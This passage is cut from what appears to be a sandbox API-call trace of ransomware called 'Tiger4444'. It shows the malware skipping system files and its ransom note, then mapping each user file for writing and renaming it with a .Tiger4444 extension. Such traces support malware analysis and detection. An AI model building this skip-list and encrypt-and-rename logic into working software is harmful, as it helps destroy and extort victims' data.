[0049.999] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\fADueh5_.png.Tiger4444") returned 54 [0049.999] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fADueh5_.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fadueh5_.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\fADueh5_.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fadueh5_.png.tiger4444"), dwFlags=0x1) returned 1 [0050.000] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58b7f810, ftCreationTime.dwHighDateTime=0x1d4cdc5, ftLastAccessTime.dwLowDateTime=0xbe2af360, ftLastAccessTime.dwHighDateTime=0x1d4d1a2, ftLastWriteTime.dwLowDateTime=0xbe2af360, ftLastWriteTime.dwHighDateTime=0x1d4d1a2, nFileSizeHigh=0x0, nFileSizeLow=0x8bd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g42UGBx1Dj.jpg", cAlternateFileName="G42UGB~1.JPG")) returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="Tiger4444.exe") returned -1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2=".") returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="..") returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="windows") returned -1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="bootmgr") returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="pagefile.sys") returned -1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="boot") returned 1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="ids.txt") returned -1 [0050.000] lstrcmpiW (lpString1="g42UGBx1Dj.jpg", lpString2="NTUSER.DAT") returned -1 [0050.000] lstrcpyW (in: lpString1=0x30aeae8, lpString2="g42UGBx1Dj.jpg" | out: lpString1="g42UGBx1Dj.jpg") returned="g42UGBx1Dj.jpg" [0050.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\g42UGBx1Dj.jpg", dwFileAttributes=0x0) returned 1 [0050.000] lstrlenW (lpString="g42UGBx1Dj.jpg") returned 14 [0050.001] lstrlenW (lpString="Tiger4444") returned 9 [0050.001] lstrcmpiW (lpString1="Bx1Dj.jpg", lpString2="Tiger4444") returned -1 [0050.001] lstrlenW (lpString=".dll") returned 4 [0050.001] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.001] lstrlenW (lpString=".lnk") returned 4 [0050.001] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.001] lstrlenW (lpString=".ini") returned 4 [0050.001] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.001] lstrlenW (lpString=".sys") returned 4 [0050.001] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.001] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\g42UGBx1Dj.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\g42ugbx1dj.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.001] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.001] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14145425097) returned 1 [0050.001] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=35793) returned 1 [0050.001] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0050.001] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0050.001] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8ee0, lpName=0x0) returned 0x2c8 [0050.002] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8ee0) returned 0xbe0000 [0050.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0050.003] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0050.003] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14145648744) returned 1 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0050.003] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0050.004] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.004] CloseHandle (hObject=0x2c8) returned 1 [0050.004] CloseHandle (hObject=0x260) returned 1 [0050.005] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\g42UGBx1Dj.jpg.Tiger4444") returned 56 [0050.005] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\g42UGBx1Dj.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\g42ugbx1dj.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\g42UGBx1Dj.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\g42ugbx1dj.jpg.tiger4444"), dwFlags=0x1) returned 1 [0050.006] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b53dcb0, ftCreationTime.dwHighDateTime=0x1d4c582, ftLastAccessTime.dwLowDateTime=0x1c6f9d80, ftLastAccessTime.dwHighDateTime=0x1d4d23a, ftLastWriteTime.dwLowDateTime=0x1c6f9d80, ftLastWriteTime.dwHighDateTime=0x1d4d23a, nFileSizeHigh=0x0, nFileSizeLow=0x111dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ir6VFeivjX.pdf", cAlternateFileName="IR6VFE~1.PDF")) returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="Tiger4444.exe") returned -1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2=".") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="..") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="windows") returned -1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="bootmgr") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="pagefile.sys") returned -1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="boot") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="ids.txt") returned 1 [0050.006] lstrcmpiW (lpString1="Ir6VFeivjX.pdf", lpString2="NTUSER.DAT") returned -1 [0050.006] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Ir6VFeivjX.pdf" | out: lpString1="Ir6VFeivjX.pdf") returned="Ir6VFeivjX.pdf" [0050.006] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ir6VFeivjX.pdf", dwFileAttributes=0x0) returned 1 [0050.006] lstrlenW (lpString="Ir6VFeivjX.pdf") returned 14 [0050.006] lstrlenW (lpString="Tiger4444") returned 9 [0050.006] lstrcmpiW (lpString1="eivjX.pdf", lpString2="Tiger4444") returned -1 [0050.006] lstrlenW (lpString=".dll") returned 4 [0050.006] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.006] lstrlenW (lpString=".lnk") returned 4 [0050.006] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0050.006] lstrlenW (lpString=".ini") returned 4 [0050.006] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0050.006] lstrlenW (lpString=".sys") returned 4 [0050.006] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0050.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ir6VFeivjX.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ir6vfeivjx.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.007] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.007] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14145969656) returned 1 [0050.007] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70108) returned 1 [0050.007] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0050.007] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0050.007] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x114e0, lpName=0x0) returned 0x2c8 [0050.007] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x114e0) returned 0xbe0000 [0050.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0050.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.009] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0050.009] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.009] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.009] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14146194849) returned 1 [0050.009] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0050.009] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0050.009] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.010] CloseHandle (hObject=0x2c8) returned 1 [0050.010] CloseHandle (hObject=0x260) returned 1 [0050.011] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ir6VFeivjX.pdf.Tiger4444") returned 56 [0050.011] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ir6VFeivjX.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ir6vfeivjx.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ir6VFeivjX.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ir6vfeivjx.pdf.tiger4444"), dwFlags=0x1) returned 1 [0050.011] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19021050, ftCreationTime.dwHighDateTime=0x1d4c59d, ftLastAccessTime.dwLowDateTime=0x100e3470, ftLastAccessTime.dwHighDateTime=0x1d4c975, ftLastWriteTime.dwLowDateTime=0x100e3470, ftLastWriteTime.dwHighDateTime=0x1d4c975, nFileSizeHigh=0x0, nFileSizeLow=0x123c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jub_eFN7HCcuHfTvv.wav", cAlternateFileName="JUB_EF~1.WAV")) returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="Tiger4444.exe") returned -1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2=".") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="..") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="windows") returned -1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="bootmgr") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="pagefile.sys") returned -1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="boot") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="ids.txt") returned 1 [0050.011] lstrcmpiW (lpString1="Jub_eFN7HCcuHfTvv.wav", lpString2="NTUSER.DAT") returned -1 [0050.011] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Jub_eFN7HCcuHfTvv.wav" | out: lpString1="Jub_eFN7HCcuHfTvv.wav") returned="Jub_eFN7HCcuHfTvv.wav" [0050.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Jub_eFN7HCcuHfTvv.wav", dwFileAttributes=0x0) returned 1 [0050.012] lstrlenW (lpString="Jub_eFN7HCcuHfTvv.wav") returned 21 [0050.012] lstrlenW (lpString="Tiger4444") returned 9 [0050.012] lstrcmpiW (lpString1="HfTvv.wav", lpString2="Tiger4444") returned -1 [0050.012] lstrlenW (lpString=".dll") returned 4 [0050.012] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.012] lstrlenW (lpString=".lnk") returned 4 [0050.012] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.012] lstrlenW (lpString=".ini") returned 4 [0050.012] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.012] lstrlenW (lpString=".sys") returned 4 [0050.012] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.012] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Jub_eFN7HCcuHfTvv.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jub_efn7hccuhftvv.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.012] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.012] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14146510406) returned 1 [0050.012] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=74693) returned 1 [0050.012] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0050.012] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0050.012] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x126d0, lpName=0x0) returned 0x2c8 [0050.012] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x126d0) returned 0xbe0000 [0050.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0050.014] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14146729469) returned 1 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0050.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0050.014] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.015] CloseHandle (hObject=0x2c8) returned 1 [0050.015] CloseHandle (hObject=0x260) returned 1 [0050.016] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Jub_eFN7HCcuHfTvv.wav.Tiger4444") returned 63 [0050.016] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Jub_eFN7HCcuHfTvv.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jub_efn7hccuhftvv.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Jub_eFN7HCcuHfTvv.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jub_efn7hccuhftvv.wav.tiger4444"), dwFlags=0x1) returned 1 [0050.016] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2b8a30, ftCreationTime.dwHighDateTime=0x1d4d0f1, ftLastAccessTime.dwLowDateTime=0x95445a40, ftLastAccessTime.dwHighDateTime=0x1d4ca31, ftLastWriteTime.dwLowDateTime=0x95445a40, ftLastWriteTime.dwHighDateTime=0x1d4ca31, nFileSizeHigh=0x0, nFileSizeLow=0x13f46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JyRwaozx.bmp", cAlternateFileName="")) returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="Tiger4444.exe") returned -1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2=".") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="..") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="windows") returned -1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="bootmgr") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="pagefile.sys") returned -1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="boot") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="ids.txt") returned 1 [0050.016] lstrcmpiW (lpString1="JyRwaozx.bmp", lpString2="NTUSER.DAT") returned -1 [0050.016] lstrcpyW (in: lpString1=0x30aeae8, lpString2="JyRwaozx.bmp" | out: lpString1="JyRwaozx.bmp") returned="JyRwaozx.bmp" [0050.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\JyRwaozx.bmp", dwFileAttributes=0x0) returned 1 [0050.017] lstrlenW (lpString="JyRwaozx.bmp") returned 12 [0050.017] lstrlenW (lpString="Tiger4444") returned 9 [0050.017] lstrcmpiW (lpString1="waozx.bmp", lpString2="Tiger4444") returned 1 [0050.017] lstrlenW (lpString=".dll") returned 4 [0050.017] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.017] lstrlenW (lpString=".lnk") returned 4 [0050.017] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.017] lstrlenW (lpString=".ini") returned 4 [0050.017] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.017] lstrlenW (lpString=".sys") returned 4 [0050.017] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.017] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\JyRwaozx.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jyrwaozx.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.017] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.017] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14147010237) returned 1 [0050.017] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=81734) returned 1 [0050.017] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0050.017] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0050.017] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14250, lpName=0x0) returned 0x2c8 [0050.017] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14250) returned 0xbe0000 [0050.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.019] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0050.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0050.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.020] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14147270000) returned 1 [0050.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0050.020] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0050.020] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.021] CloseHandle (hObject=0x2c8) returned 1 [0050.021] CloseHandle (hObject=0x260) returned 1 [0050.022] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\JyRwaozx.bmp.Tiger4444") returned 54 [0050.022] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\JyRwaozx.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jyrwaozx.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\JyRwaozx.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jyrwaozx.bmp.tiger4444"), dwFlags=0x1) returned 1 [0050.022] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7298d0a0, ftCreationTime.dwHighDateTime=0x1d4d0e6, ftLastAccessTime.dwLowDateTime=0xdfd27270, ftLastAccessTime.dwHighDateTime=0x1d4d5cd, ftLastWriteTime.dwLowDateTime=0xdfd27270, ftLastWriteTime.dwHighDateTime=0x1d4d5cd, nFileSizeHigh=0x0, nFileSizeLow=0xaef4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lfhe6KRJPHl.ods", cAlternateFileName="LFHE6K~1.ODS")) returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="Tiger4444.exe") returned -1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2=".") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="..") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="windows") returned -1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="bootmgr") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="pagefile.sys") returned -1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="boot") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="ids.txt") returned 1 [0050.022] lstrcmpiW (lpString1="Lfhe6KRJPHl.ods", lpString2="NTUSER.DAT") returned -1 [0050.023] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Lfhe6KRJPHl.ods" | out: lpString1="Lfhe6KRJPHl.ods") returned="Lfhe6KRJPHl.ods" [0050.023] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Lfhe6KRJPHl.ods", dwFileAttributes=0x0) returned 1 [0050.023] lstrlenW (lpString="Lfhe6KRJPHl.ods") returned 15 [0050.023] lstrlenW (lpString="Tiger4444") returned 9 [0050.023] lstrcmpiW (lpString1="RJPHl.ods", lpString2="Tiger4444") returned -1 [0050.023] lstrlenW (lpString=".dll") returned 4 [0050.023] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0050.023] lstrlenW (lpString=".lnk") returned 4 [0050.023] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0050.023] lstrlenW (lpString=".ini") returned 4 [0050.023] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0050.023] lstrlenW (lpString=".sys") returned 4 [0050.023] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0050.023] CreateFileW 